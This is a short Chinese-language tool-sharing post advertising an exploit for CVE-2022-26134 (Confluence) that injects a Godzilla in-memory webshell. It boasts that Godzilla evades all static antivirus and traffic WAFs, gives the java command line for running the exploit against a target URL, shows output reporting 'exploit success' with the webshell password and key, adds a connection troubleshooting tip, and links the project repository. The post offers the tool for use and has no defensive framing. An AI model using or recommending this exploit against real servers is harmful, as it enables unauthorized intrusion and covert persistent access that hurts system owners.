CVE-2022-26134-Godzilla-MEMSHELL 哥斯拉密码
作者:Sec-Labs | 发布时间:
相关阅读
- Freebuf社区:【原创】哥斯拉Godzilla加密流量分析
哥斯拉Godzilla是由@BeichenDream开发的一款优秀的shell权限管理工具,其特点有:
1. 哥斯拉全部类型的shell均过市面所有静态查杀
2. 哥斯拉流量加密过市面全部流量waf
3. 哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的
使用方法
Usage
java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥
example
java -jar CVE-2022-26134.jar pass key如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理
Connection: close
C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key
C:\CVE_2022_26134_jar>
项目地址
https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
标签:工具分享, 免杀技巧